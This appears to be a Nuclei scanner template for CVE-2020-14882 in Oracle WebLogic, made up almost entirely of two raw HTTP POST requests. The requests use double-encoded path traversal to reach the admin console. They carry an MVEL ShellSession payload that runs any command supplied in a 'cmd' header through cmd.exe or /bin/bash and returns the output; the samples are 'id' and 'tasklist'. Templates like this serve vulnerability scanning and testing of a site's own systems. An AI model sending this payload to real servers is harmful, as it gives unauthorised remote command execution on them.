CVE-2020-14882.yaml

id: CVE-2020-14882

info:
  name: Weblogic RCE GET request 
  author: medbsq
  severity: critical 
  # link: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf


requests:
  - raw:
    - |
      POST //console/images/%252e%252e%252fconsole.portal HTTP/1.1
      Host: {{Hostname}}
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded
      cmd: id
      
      _nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("var+m+%3d+java.lang.Class.forName("weblogic.work.ExecuteThread").getDeclaredMethod("getCurrentWork")%3b+var+currThread+%3d+java.lang.Thread.currentThread()%3b+var+currWork+%3d+m.invoke(currThread)%3b+var+f2+%3d+currWork.getClass().getDeclaredField("connectionHandler")%3b+f2.setAccessible(true)%3b+var+connectionHandler+%3d+f2.get(currWork)%3b+var+f3+%3d+connectionHandler.getClass().getDeclaredField("request")%3b+f3.setAccessible(true)%3b+var+request+%3d+f3.get(connectionHandler)%3b+var+command+%3d+request.getHeader("cmd")%3b+var+response+%3d+request.getResponse()%3b+var+isWin+%3d+java.lang.System.getProperty("os.name").toLowerCase().contains("win")%3b+var+listCmd+%3d+new+java.util.ArrayList()%3b+var+p+%3d+new+java.lang.ProcessBuilder("")%3b+if(isWin){p.command("cmd.exe",+"/c",+command)%3b+}else{p.command("/bin/bash",+"-c",+command)%3b+}+p.redirectErrorStream(true)%3b+var+process+%3d+p.start()%3b+var+output+%3d+process.getInputStream()%3b+var+scanner+%3d+new+java.util.Scanner(output).useDelimiter("\\\\A")%3b+var+out+%3d+scanner.next()%3b+var+outputStream+%3d+response.getServletOutputStream()%3b+outputStream.write(out.getBytes())%3b+outputStream.flush()%3b+response.getWriter().write("")%3b+currThread.interrupt()%3b")
    - |
      POST //console/images/%252e%252e%252fconsole.portal HTTP/1.1
      Host: {{Hostname}}
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded
      cmd: tasklist

      _nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("var+m+%3d+java.lang.Class.forName("weblogic.work.ExecuteThread").getDeclaredMethod("getCurrentWork")%3b+var+currThread+%3d+java.lang.Thread.currentThread()%3b+var+currWork+%3d+m.invoke(currThread)%3b+var+f2+%3d+currWork.getClass().getDeclaredField("connectionHandler")%3b+f2.setAccessible(true)%3b+var+connectionHandler+%3d+f2.get(currWork)%3b+var+f3+%3d+connectionHandler.getClass().getDeclaredField("request")%3b+f3.setAccessible(true)%3b+var+request+%3d+f3.get(connectionHandler)%3b+var+command+%3d+request.getHeader("cmd")%3b+var+response+%3d+request.getResponse()%3b+var+isWin+%3d+java.lang.System.getProperty("os.name").toLowerCase().contains("win")%3b+var+listCmd+%3d+new+java.util.ArrayList()%3b+var+p+%3d+new+java.lang.ProcessBuilder("")%3b+if(isWin){p.command("cmd.exe",+"/c",+command)%3b+}else{p.command("/bin/bash",+"-c",+command)%3b+}+p.redirectErrorStream(true)%3b+var+process+%3d+p.start()%3b+var+output+%3d+process.getInputStream()%3b+var+scanner+%3d+new+java.util.Scanner(output).useDelimiter("\\\\A")%3b+var+out+%3d+scanner.next()%3b+var+outputStream+%3d+response.getServletOutputStream()%3b+outputStream.write(out.getBytes())%3b+outputStream.flush()%3b+response.getWriter().write("")%3b+currThread.interrupt()%3b")
    

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "ADMINCONSOLESESSION"
        part: header
      - type: word
        words:
          - "Session"
          - "PID"
          - "uid"
        condition: or
      - type: status
        status: 
          - 200